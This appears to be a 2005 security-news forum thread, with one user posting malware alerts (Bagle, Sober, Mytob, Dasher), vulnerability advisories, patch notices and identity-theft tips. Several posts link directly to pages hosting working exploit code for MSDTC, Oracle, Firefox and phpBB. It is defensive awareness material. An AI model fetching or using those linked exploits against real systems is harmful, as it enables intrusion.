- Solved severe stability issue when using the Acrobat Reader 7.0.5 plug-in.
Miscellaneous
- Fixed multiple stability issues.
FrSIRT Critical Advisory Information – Key Security Changes
http://www.frsirt.com/english/advisories/2005/2519
Multiple vulnerabilities were identified in Opera, which could be exploited by attackers to execute arbitrary commands.
The first issue is due to a memory corruption error in Macromedia Flash Player, a third party application redistributed with Opera, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted Web page or open a malicious Flash file. For additional information, see : FrSIRT/ADV-2005-2317
The second vulnerability is due to an error where the shell script used in Unix / Linux based environments to launch Opera parses shell commands enclosed within backticks in the URL provided via the command line, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to follow a malicious link in an external program (e.g. Thunderbird or Evolution). This issue is similar to FrSIRT/ADV-2005-1794
-
November 23, 2005 at 1:15 pm #3113997
Bagle/Beagle – Several pre-Thanksgiving variants
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
F-Secure and McAfee report several new variants and this list could grow. Batten down the hatches.
F-Secure – 6 new variants
http://www.f-secure.com/v-descs/bagle_eo.shtml
http://www.f-secure.com/v-descs/bagle_ep.shtml
http://www.f-secure.com/v-descs/bagle_eq.shtml
http://www.f-secure.com/v-descs/bagle_er.shtml
http://www.f-secure.com/v-descs/bagle_es.shtml
http://www.f-secure.com/v-descs/bagle_et.shtmlMcAfee detection information
http://vil.nai.com/vil/content/v_137087.htmQuote: Several new W32/Bagle downloader variants have been widely spammed to users (November 23, 2005). To date, they are detected as W32/Bagle.gen@MM with the 4635 DATs.
These are downloader trojans. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and uses peoples names as the filenames, for example:
* Edmund.zip
* Elizabeth.zip
* Fraunces.zip
* Grace.zip
* Henrie.zip
* Jeames.zip -
November 24, 2005 at 9:14 am #3113817
Rootkits – Good Article defining what a rootkit is
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
CHARACTERISTICS OF A ROOTKIT:
1. A rootkit subsitutes malicious code in place of legitimate Operating System routines. It does so in a highly stealth-like manner by turning off certain security routines.2. They are difficult to detect. Anti-virus (AV) software must be programmed in a special complex way to even detect this software. AV products can’t interogate protected operating system files as well as they can other files.
3. Rootkits are difficult to clean as they ingranulate deeply within the Registry and system files. Unless you have a proven rootkit cleaning tool, you should rebuild the PC completely from the ground up, so that there are assurances that all rootkit components are gone.
Quote: The Sony BMG copy protection debacle has pulled “rootkit” out of the hacker underground and into the wider world of regular computer users. But while those PC owners may now recognize the term, that doesn’t necessarily mean they know what kind of threat it describes. And in the Sony case, not even the experts can agree on whether the record label’s antipiracy technology meets the technical definition of a rootkit CNET Article: What makes a rootkit?
-
November 24, 2005 at 9:15 am #3113816
Sober.X Worm – Special FBI Warning
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
QUOTE: Washington, D.C. – The FBI is warning the public to avoid falling victim to an on-going mass e-mail scheme wherein computer users received unsolicited e-mails purportedly sent by the FBI. These scam e-mails tell the recipients that their Internet use has been monitored by the FBI and that they have accessed illegal web sites. The e-mails then direct recipients to open an attachment and answer questions.
-
November 25, 2005 at 9:14 am #3122678
SANS – Twenty Most Critical Internet Security Vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
-
November 25, 2005 at 9:14 am #3122679
Mytob.MX – New variant rated Medium by Trend
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
? This new mass-mailing worm combines Mydoom functionality with Sdbot functionality. It can launch an IRC bot and install a downloader component that may install other malware from hostile web sites.
McAfee – Mytob.HE (DAT 4636 provides protection)F-Secure – MyTob.DO Information
Trend – Mytob.MX information – rated as MEDIUM RISK
Trend – Mytob.MX behavorial chart (excellent analysis)
Trend – Mytob.MX example of emailEMAIL TO BLOCK OR AVOID
Subject: (avoid all of the following)
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification Members Support
Security measures
Email Account Suspension
Notice of account limitationAttachment: (avoid all of the following)
• {Random file name}.zip
• account-details.zip
• account-info.zip
• account-password.zip
• account-report.zip
• approved-password.zip
• document.zip
• email-details.zip
• email-password.zip
• important-details.zip
• new-password.zip
• password.zip
• updated-password.zip -
November 26, 2005 at 9:15 am #3044016
FortiNet Security Site – Good Statistics on viruses & spyware
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
During early morning research, I discovered a good security site It provides one day, one week, and one month Top 10 virus statistical counts. Below are some key resources and the 1st link is a good one to bookmark for monitoring current Internet activities:
FortiNet Security Site – Good Statistics on viruses & spyware
Top Ten viruses
http://www.fortinet.com/FortiGuardCenter/global_threat_stats.html
Current Major Viruses & Spyware Overview
http://www.fortinet.com/FortiGuardCenter/av.html
Current Major Vulnerabilities
http://www.fortinet.com/FortiGuardCenter/idp.htmlWeb URL Lookup and testing facility
http://www.fortinet.com/FortiGuardCenter/webfiltering.html
]In addition to forums and blogs, below is a partial list of some free resources to monitor current developmentsMicrosoft sites (Security, Technet, At Home, MSRC, Live)
http://www.microsoft.com/security/default.mspx
http://www.microsoft.com/technet/security/default.mspx
http://www.microsoft.com/athome/security/community/default.mspx
http://blogs.technet.com/msrc/
http://safety.live.com/
AVERT – McAfee Security and AV developments
http://myavert.avertlabs.com/myavert/default.aspxSecunia – New virus and security advisories
http://secunia.com/virus_information/Internet Storm Center – Major security advisories
http://isc.sans.org/FrSIRT – New Security Vulnerabilities & Exploits
http://www.frsirt.com/english/
CERT – Major security advisories
http://www.us-cert.gov/current/current_activity.htmlVirus Total – Top 10 realtime & great testing site
http://www.virustotal.com/flash/index_en.html
F-Secure – Top 10 & WebLog
http://www.f-secure.com/virus-info/statistics/
http://www.f-secure.com/weblog/Kaspersky Weblog
http://www.viruslist.com/en/weblogInfoSys Security
http://www.infosyssec.net/
and finally, I wonder who created this great site? -
November 27, 2005 at 5:15 pm #3043837
MS05-051 –POC Exploit published for critical DTC vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This proof-of-concept DTC exploit appears to be reverse engineered from the October updates. As this critical vulnerability impacts communications security, it could be potentially crafted into a new Internet worm, based on some reports I’ve read. Please be sure you are up-to-date on all Microsoft Windows updates (esp. through October 2005).
Microsoft Windows Distributed Transaction Coordinator Remote Exploit (MS05-051)
Please be careful as this link contains actual exploit code below:
http://www.frsirt.com/exploits/20051127.55k7-msdtc.c.php -
December 15, 2005 at 7:28 pm #3125849
Sony SunnComm vulnerability – Avoid playing these 27 CDs in your PC
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The danger is associated with copy-protection software included on some Sony discs created by a company called SunnComm Technologies. The vulnerability could allow malicious programmers to gain control of computers that have run the software, which is typically installed automatically when a disc is put in a computer’s CD drive.
Sony lists 27 CDs with SunnComm MediaMax vulnerability
27 CDs containing SunnComm MediaMax Version 5 Content Protection Software
-
December 15, 2005 at 7:28 pm #3125846
Oracle 9i Database XDB HTTP Authentication Remote Stack Overflow Exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A new critical proof-of-concept exploit has been been published for Oracle 9 web based apps.
Oracle 9i Database XDB HTTP Authentication Remote Stack Overflow Exploit
http://www.frsirt.com/exploits/20051208.oracle9i_xdb_http.pm.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
http://isc.sans.org/ -
December 15, 2005 at 7:28 pm #3125847
New JS_Downloader viruses exploit unpatched 911302 IE vulnerability
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Trend notes at least three new Java Script based viruses have emerged which exploit the unpatched 911302 IE vulnerability. Please be careful using Internet Explorer and visit only websites you trust.
This JavaScript malware may be opened using Internet Explorer (IE) while a user visits different Web sites. It uses a known vulnerability in IE, which results in the download and execution of files without the knowledge of the user.
More information: Microsoft Security Advisory (911302)
-
December 15, 2005 at 7:28 pm #3125848
Sober.X (CME-681) – New malware updates scheduled Jan 5, 2006
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Personally, I’m still receiving lots of copies of Sober.x on a daily basis in my personal email accounts. On an infected PC, Sober.X creates a backdoor that allows it to autoupdate. Both F-Secure and CERT have issued warnings for new malware updates that will be automatically scheduled on January 6, 2006.
Secunia – Sober.X (CME-681) Anti-Virus links
http://secunia.com/virus_information/23836/sober.x/F-Secure details how the URL calculation process works
http://www.f-secure.com/weblog/archives/archive-122005.html#00000729QUOTE: Sober.Y was the biggest email outbreak of the year. It still is responsbile for around 40% of all the infections we see. This variant is programmed to activate on January 5th, 2006. After this date all the infected machines will regularily try to download and run a file from a website, forever.
So, what URL is the virus using? This is the tricky part. The virus writer knows well that if he uses a single, constant address in the virus body, it will get blocked quickly. So instead, Sober has been using an algorithm to create pseudorandom URLs which will change based on date. These URLs point to free hosting servers typically operating in Germany or in Austria. And 99% of the URLs generated by the virus simply don’t exist.
However, the virus author can precalculate the URL for any date, and when he wants to run something on all the infected machines, he just registers the right URL, uploads his program and BANG! It’s run globally in hundreds of thousands of machines.
Special CERT warning
http://www.us-cert.gov/current/current_activity.html#soberxQUOTE: US-CERT is aware of functionality that could allow the mass-mailing worm known as “W32/Sober.X” to automatically update itself. W32/Sober.X is a bi-lingual (English and German) mass-mailing worm that utilizes its own SMTP engine to propagate. The W32/Sober.X worm began propagating on November 15, 2005 and will attempt to update itself on or around January 5, 2006.
US-CERT strongly recommends that users and administrators implement the following general protection measures:
* Install anti-virus software, and keep its virus signature files up-to-date
* Do not follow unsolicited web links or execute attachments received in email messages, even if sent by a known and trusted source
* Keep up-to-date on patches and fixes for your operating system -
December 15, 2005 at 7:28 pm #3125843
New Firefox Exploit affects versions earlier than 1.05
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Yesterday, a brand new exploit affecting OLDER versions of Firefox was published. It is important to stay up-to-date on the latest product versions, as security updates are often a critical component of each version update.
Mozilla Firefox “InstallVersion.compareTo” Remote Buffer Overflow Exploit
Please be careful at this site as actual exploit code resides here
http://www.frsirt.com/exploits/20051212.fireburn.phpOriginal Advisory from July 2005
http://www.frsirt.com/english/advisories/2005/1075Remotely Exploitable : Yes
Locally Exploitable : YesAffected Products: Mozilla Firefox 1.0.4 and prior, Mozilla Suite 1.7.8 and prior, Thunderbird 1.0.2 and prior
Solution: Upgrade to Mozilla Firefox 1.5 or later versions of the Mozilla Suite and Thunderbird
-
December 15, 2005 at 7:28 pm #3125844
Microsoft Security Updates – December 2005
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Security patches have been issued for both Windows and Internet Explorer. This update went well on my home PC with no issues and I recommend updating all workstations as soon as possible.
Windows Update Link
http://www.microsoft.com/windowsupdate/Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/Bulletin/ms05-054.mspxImpact of Vulnerability: Remote Code Execution
Maximum Severity Rating: CriticalSecurity Update Replacement: This update replaces the update that is included with Microsoft Security Bulletin MS05-052. That update is also a cumulative update.
Addresses four Vulnerabilities in Internet Explorer:
1. File Download Dialog Box Manipulation Vulnerability (CAN-2005-2829)
2. HTTPS Proxy Vulnerability (CAN-2005-2830)
3. COM Object Instantiation Memory Corruption Vulnerability (CAN-2005-2831)
4. Mismatched Document Object Model Objects Memory Corruption Vulnerability (CAN-2005-1790)Microsoft Security Bulletin MS05-055
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (908523)
http://www.microsoft.com/technet/security/Bulletin/ms05-055.mspxImpact of Vulnerability: Elevation of Privilege
Maximum Severity Rating: ImportantAddresses the following Vulnerability in Windows: Windows Kernel Vulnerability – A privilege elevation vulnerability exists in the way that asynchronous procedure calls are processed within the kernel. This vulnerability could allow a logged on user to take complete control of the system (CAN-2005-2827)
-
December 15, 2005 at 7:28 pm #3125845
Kongo31.XRW — EMAIL with False McAfee download links
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Please delete all associated email claiming to offer update protection from Kongo31.XRW. McAfee does not send out email notices link this way and you should continue to update through normal channels.
QUOTE: We’ve received several reports of emails, warning about a new virus called “Kongo31.XRW” (which doesn’t exist). The email links to a fake McAfee site, hosted in Canada: The download link gets you a file called ak26xrw-patch-installer-win32.exe – which (surprise, surprise!) is infected with Trojan-Downloader.Win32.Hanlo.h
Kongo31.XRW — False McAfee download links
http://www.f-secure.com/weblog/archives/archive-122005.html#00000733Kongo31.XRW — email Example
http://www.f-secure.com/weblog/archives/mcafeecenter.gifKongo31.XRW — Special McAfee warning
http://vil.mcafeesecurity.com/vil/content/v_137511.htm -
December 15, 2005 at 7:28 pm #3125841
Best Practices: Send Real Greeting Cards or Plain Text Messages
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Seasonal email attachments, HTML messages, Electronic Greeting Cards, and URL links can potentially contain spyware or viruses. It’s a popular approach and one idea offered by the Internet Storm Center is to send “plain text” messages to our family and friends. This approach communicates a good personal message and it also promotes security awareness. As a best practice, I’ve always advocated sending a real greetings card in lieu of e-cards.
Best Practices: Send Real Greeting Cards or Plain Text Messages
http://isc.sans.org/diary.php?storyid=933 -
December 15, 2005 at 7:28 pm #3125842
New Beagle.CX/Bagle.CD variant
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The Trojan horse version is out and there’s speculation that an email based version may follow.
McAfee
http://secunia.com/virus_information/25131/bagle.gend1511020/
Symantec
http://www.sarc.com/avcenter/venc/data/w32.beagle.cx@mm.html
Trend
http://secunia.com/virus_information/25129/trojbagle.cd/Trojan Characteristics: This threat is detected as W32/Bagle.gen with the 4651 DAT files, or newer. This is a downloader trojan. However, like previous. Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE …
EMAIL TO BLOCK OR AVOID
Subject:
New Year’s
New Year’s Day.
Happy New Year
We congratulate happy New Year
New 2006
Message:
Password: –LINK TO IMAGE FILE–
The password is –LINK TO IMAGE FILE– -
December 15, 2005 at 7:28 pm #3125515
Dasher.B – Internet worm exploits MS05-051 vulnerability
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
While the early versions of Dasher are not working well, this new development should be watched as the code to spread this new Internet based worm could be improved in later variants.
Dasher.B: Sophos information
http://www.sophos.com/virusinfo/analyses/w32dasherb.htmlDasher.A: F-Secure:
http://www.f-secure.com/weblog/archives/archive-122005.html#00000735Dasher.A: MS05-051 (MSDTC) Malware / Port 1025
http://isc.sans.org/diary.php?storyid=934W32/Dasher-B spreads by exploiting the MSDTC (MS05-051) vulnerability.
When run the worm creates the following files :
<Windows system folder>\wins\sqlexp.exe
<Windows system folder>\wins\sqlscan.exe
<Windows system folder>\wins\svchost.exe
Sqlscan.exe is a port scanner, used to search networks for open ports.
Sqlexp.exe and svchost.exe are detected as W32/Dasher-B.W32/Dasher-B searches a set of pre-defined networks for open ports and attempts to exploit and vulnerable computers it finds. The exploit opens a backdoor on the vulnerable computer and causes it to connect to a remote server for further instructions. At the time of writing the instructions supplied by the remote server cause the exploited computer to download and execute two further programs.
-
December 19, 2005 at 1:19 pm #3123850
Microsoft IIS 5.1 for Windows XP – New DoS exploit published
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has greatly improved the security associated with IIS and this DoS exploit is specifically targeted for IIS 5.1 running on Windows XP based systems. This is most likely a platform used by web development rather than production Internet based servers.
Microsoft IIS 5.1 – DoS exploit released
http://isc.sans.org/diary.php?storyid=944Microsoft IIS Malformed URL Potential Denial of Service Vulnerability
http://secunia.com/advisories/18106/Microsoft IIS 5.1 – FrSIRT advisory
While this link is safe, please be careful with any actual exploit links you find at the FrSIRT site
http://www.frsirt.com/english/advisories/2005/2963QUOTE: Inge Henriksen has discovered a vulnerability in Microsoft Internet Information Services (IIS), which potentially can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of certain malformed URL. This can be exploited to cause the IIS service to crash.
Successful exploitation requires that “[dir]” is a virtual directory that is configured with “Scripts & Executables” execution permissions.Note: IIS will automatically restart after the crash. The vulnerability has been confirmed in IIS 5.1 on a full patched version of Microsoft Windows XP SP2.
Solution: Filter potential malicious characters or character sequences with a HTTP proxy.
Special Note: IIS 5.0 and 6.0 are reportedly not affected.
-
December 20, 2005 at 9:21 am #3125058
MS05-051 – Dasher.D appears to be more potent than prior variants
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Malicious individuals are continuing to improve the capability for the new Dasher Internet worm to spread more actively to unpatched systems. We will most likely see more variants attempting to attack any unpatched systems.
MS05-051 – Dasher.D appears to be more potent than prior variants
http://securityresponse.symantec.com/avcenter/venc/data/w32.dasher.d.html* Microsoft Windows MSDTC Memory Corruption Vulnerability (as described in the * Microsoft Security Bulletin MS05-051) on TCP port 1025.
* The Microsoft Windows WINS Name Value Handling Remote Buffer Overflow Vulnerability(as described in the Microsoft Security Bulletin MS05-051), using TCP port 42.
* The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039)
* The Microsoft SQL Server User Authentication Remote Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS02-056). -
December 20, 2005 at 1:18 pm #3124866
Symantec AV products – Critical Buffer Overflow on RAR files
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Symantec will most likely quickly patch this newly discovered vulnerability and currently there are no known exploits in the wild.Symantec AV products – Critical Buffer Overflow on RAR files
http://www.frsirt.com/english/advisories/2005/3003Advisory ID : FrSIRT/ADV-2005-3003
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-20Technical Description — A critical vulnerability has been identified in various Symantec AntiVirus products, which may be exploited by remote attackers or malware to execute arbitrary code. This flaw is due to a heap overflow error in the “Dec2Rar.dll” library when pocessing certain length fields in the sub-block headers of RAR archives, which may be exploited by an unauthenticated remote attacker to execute arbitrary commands and take complete control of an affected system (e.g. by sending an email containing a specially crafted attachment).
Currently FrSIRT is unaware of any patches.
-
December 22, 2005 at 5:37 am #3198113
Article: The human factor and information security
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Computer Security involves a two-part process of protecting resources. The first component is adding security software and fortifying defenses so that most attacks from the outside can be blocked. The second step is making certain folks follow the best practices in security, so that they resist traps and social engineering schemes.
You can think of step one as placing a fence around the chicken coup to keep the fox out. But if chicken opens the door and lets a disguised fox in, then they’ve lost the battle. Thus users should always protect their systems with anti-virus, anti-spyware, and firewall software. Secondly, they need to “think before they click” and suspect that any email or instant message could pose harm for their systems.
http://www.viruslist.com/en/analysis?pubid=176195190
Key Topics in the article
- Computer security as a system
- People are part of the system
- Security vulnerabilities and some examples
- Conclusion
-
December 22, 2005 at 5:37 am #3198112
Santa IM worm – Invites users to a Santa site and installs a rootkit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Folks need to treat Instant Messages with the same care and suspicions they would email. Files or URLs found in Instant Messages can be malicious. This new IM worm installs a rootkit which can be very difficult for AV software to detect and remove.
Links are noted below
QUOTE: A new worm posing as a come-on to a Santa Claus site is traveling across all the major instant messaging networks, a security firm warned Tuesday, and when recipients visit the bogus site, they’re infected with a file hidden from sight by a rootkit. IMlogic said that the worm, dubbed “M.GiftCom.All,” is circulating on the MSN, AOL, ICQ, and Yahoo instant messaging services, is a “Medium” threat, a relatively rare classification for the Waltham, Mass.-based company. Most IM worms and Trojans listed on its Threat Center receive only a “Low” classification. Like virtually all IM worms, M.GiftCom.All includes a URL in messages it spams out to contacts hijacked from previously-infected PCs
-
December 22, 2005 at 1:39 pm #3198281
Identity Theft: Some helpful tips to prevent this
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A corporate attorney sent the following out to the employees in his company.
1. The next time you order checks have only your initials (instead of first name) and last name put on them. If someone takes your checkbook, they will not know if you sign your checks with just your initials or your first name, but your bank will know how you sign your checks.
2. Do not sign the back of your credit cards. Instead, put “PHOTO ID REQUIRED.”
3. When you are writing checks to pay on your credit card accounts, DO NOT put the complete account number on the “For” line. Instead, just put the last four numbers. The credit card company knows the rest of the number, and anyone who might be handling your check as it passes through all the check-processing channels will not have access to it.
4. Put your work phone # on your checks instead of your home phone. If you have a PO Box, use that instead of your home address. If you do not have a PO Box, use your work address. Never have your Social Security printed on your checks, (DUH!). You can add it if it is necessary. However, if you have it printed, anyone can get it.
5. Place the contents of your wallet on a photocopy machine. Do both sides of each license, credit card, etc. You will know what you had in your wallet and all of the account numbers and phone numbers to call and cancel. Keep the photocopy in a safe place. Also carry a photocopy of your passport when traveling either here or abroad. We have all heard horror stories about fraud that is committed on us in stealing a name, address, Social Security number, credit cards.
6. When you check out of a hotel that uses cards for keys (and they all seem to do that now), do not turn the “keys” in. Take them with you and destroy them. Those little cards have on them all of the information you gave the hotel, including address and credit card numbers and expiration dates. Someone with a card reader, or employee of the hotel, can access all that information with no problem whatsoever.
* * *
Unfortunately, as an attorney, I have first hand knowledge because my wallet was stolen last month. Within a week, the thieve(s) ordered an expensive monthly cell phone package, applied for a VISA credit card, had a credit line approved to buy a Gateway computer and received a PIN number from DMV to change my driving record information online. Here is some critical information to limit the damage in case this happens to you or someone you know:
1. We have been told we should cancel our credit cards immediately. The key is having the toll free numbers and your card numbers handy so you know whom to call. Keep those where you can find them.
2. File a police report immediately in the jurisdiction where your credit cards, etc., were stolen. This proves to credit providers you were diligent, and this is a first step toward an investigation (if there ever is one). However, here is what is perhaps most important of all (I never even thought to do this.)
3. Call the three national credit reporting organizations immediately to place a fraud alert on your name and Social Security number. I had never heard of doing that until advised by a bank that called to tell me an application for credit was made over the Internet in my name. The alert means any company that checks your credit knows your information was stolen, and they have to contact you by phone to authorize new credit. By the time I was advised to do this, almost two weeks after the theft, all the damage had been done There are records of all the credit checks initiated by th= e thieves’ purchases, none of which I knew about before placing the alert. Since then, no additional damage has been done, and the thieves threw my wallet away this weekend (someone turned it in). It seems to have stopped them dead in their tracks.
Now, here are the numbers you always need to contact about your wallet and contents being stolen:
1.) Equifax: 1-800-525-6285
2.) Experian (formerly TRW): 1-888-397-3742
3.) TransUnion : 1-800-680-7289
4.) Social Security Administration (fraud line): 1-800-269-0271 -
December 24, 2005 at 9:36 am #3081357
Bagle – New variants use ZIP files with an individual’s name
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Several new variants of the Bagle downloader trojan and corresponding email worm have surfaced recently. These new variants use ZIP files with an individual’s name as a social engineering scheme to appear as possibly safe attachments. Users should avoid opening any email attachment until it has been tested to ensure it safe even on legitimate email correspondence.
This is a downloader trojan. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and uses peoples names as the filenames:
- Edmund.zip
- Elizabeth.zip
- Fraunces.zip
- Grace.zip
- Henrie.zip
- Jeames.zip
Symantec information is noted below:
Several reports from Sophos are noted below:
– BagleDl-BD Reported by Sophos – BagleDl-BB Reported by Sophos – BagleDl-BC Reported by Sophos – BagleDl-BA Reported by Sophos – BagleDl-AZ Reported by Sophos -
December 24, 2005 at 5:36 pm #3081301
phpBB Remote Command Execution and SQL Injection Exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A major new phpBB attack is circulating and site administrators should ensure they are on phpBB version 2.0.18 or higher.
phpBB Remote Command Execution and SQL Injection Vulnerabilities
http://www.frsirt.com/english/advisories/2005/2250Technical Description: Multiple vulnerabilities were identified in phpBB, which could be exploited by remote attackers to execute arbitrary commands or conduct SQL injection and cross site scripting attacks.
Exploit Code example
Please be careful as actual exploit code is present here
http://www.frsirt.com/exploits/20051224.r57phpbb2017.pl.phpAffected Products: phpBB version 2.0.17 and prior
Solution – Upgrade to phpBB version 2.0.18
http://www.phpbb.com/downloads.php -
December 25, 2005 at 5:38 am #3081252
SpyWare Forums: The twelve e-mails of Christmas!
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Some of my friends at the SpyWare forums, have created an interesting version of the 12 days of Christmas. May everyone reading this have a wonderful Christmas, Hanukkah, and other special holidays being celebrated at this time. Here’s also hoping that 2006 is the best year ever as we go into a brand new year next week.
SpyWare Forums: The twelve e-mails of Christmas!
On the first day of Christmas my e-mail sent to me; A virus for my PC.
On the second day of Christmas my e-mail sent to me; Two Sasser Worms, and a virus for my PC.
On the third day of Christmas my e-mail sent to me; Three search bars, two Sasser Worms and a virus for my PC.
On the fourth day of Christmas my e-mail sent to me; Four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the fifth day of Christmas my e-mail sent to me; Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the sixth day of Christmas my e-mail sent to me; Six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the seventh day of Christmas my e-mail sent to me; Seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the eighth day of Christmas my e-mail sent to me; Eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the ninth day of Christmas my e-mail sent to me; Nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the tenth day of Christmas my e-mail sent to me; Ten BHOs, nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the eleventh day of Christmas my e-mail sent to me; Eleven peper files, ten BHOs, nine Qoologics, eight Smitfrauds, seven rootkits, six WinTools, Cool Web Search, four Trojan horses, three search bars, two Sasser Worms and a virus for my PC.
On the twelfth day of Christmas my e-mail sent to me; A link to http://forums.spywareinfo.com
-
December 25, 2005 at 5:35 pm #3082457
Linux Security: IP Tables Tutorial
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Below are some key links that can help strengthen Linux security controls:
Internet Storm Center Article
http://isc.sans.org/diary.php?storyid=962Introduction to IP Tables
http://www.ip-solutions.net/firewall/servers.htmlAdvanced Tutorial
http://www.sans.org/rr/special/index.php?id=adaptive_firewalls -
December 26, 2005 at 9:35 am #3082369
VMware – Critical Security Update should be applied quickly
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
VMware is a great management product for server consolidation as it creates logical partitions on large corporate servers to run multiple operating systems efficiently. A critical security update has been issued and system administrators are urged to apply this patch quickly.
VMware ESX Server – Critical update for Cross Site Scripting Issue
http://www.frsirt.com/english/advisories/2005/3084Advisory ID : FrSIRT/ADV-2005-3084
Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-24Technical Description: A vulnerability has been identified in VMware ESX Server, which may be exploited by attackers to inject malicious HTML code. This flaw is due to an input validation error in the VMware Management Interface that does not properly validate certain parameters, which may be exploited by attackers to cause arbitrary scripting code to be executed by the user’s browser in the security context of an affected Web site.
Affected Products: WMware ESX Server 2.0.x, 2.1.x, 2.5.x
Solution: Apply latest VmWare Patches
http://www.vmware.com/support/kb/enduser/std_adp.php?p_faqid=2001 -
December 26, 2005 at 9:35 am #3082368
Spam messages could use Seasonal Greetings in subject line to trick users
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
During the past week, several spam emails have been received labeled simply as “MERRY CHRISTMAS“. However, the author was an unfamiliar name, so that is one method to quickly spot and avoid these types of messages.
As a person’s name is spoofed in the author field, these messages could appear to be legimitate. On a couple of these, the author seemed to be a familiar name and I wasn’t certain if it was spam until the message was opened.
Some of these messages were carefully evaluated from a security standpoint. While most were aggressive advertising messages, some pointed to websites. Visiting an unknown website can introduce spyware or other malware agents.
Most likely “HAPPY NEW YEAR” messages will be coming. In addition to spam, many viruses use themes and social engineering approaches centered around holiday greetings.
Please be careful with all email you encounter, as messages that appear to be safe could be designed to trick folks in infecting their PCs with spyware or viruses. Keep your AV software and Windows updated to the latest levels of protection. Finally, as an additional safety precaution, processing email in a plain text mode can help some.
-
December 27, 2005 at 9:35 am #3083020
Virkel.F: Spoofed as an MSN Messenger beta 8 download
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A new MSN “beta” is being offered to lure folks into infecting their existing PCs and MSN environment. As a best practice, never accept software updates or products by email. As an example, Microsoft does not distribute any software by email.
Virkel.F: Spoofed as an MSN Messenger beta 8 download
QUOTE: There is no MSN Messenger 8. Not yet anyway.However, there’s a new virus going around pretending to be “MSN Messenger 8 Working BETA“. There’s two ways to catch it. First, by downloading it from a fake site where it has been supposedly “leaked” …
-
December 28, 2005 at 5:37 pm #3083710
Malicious Zero Day Windows Media File Exploits are in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
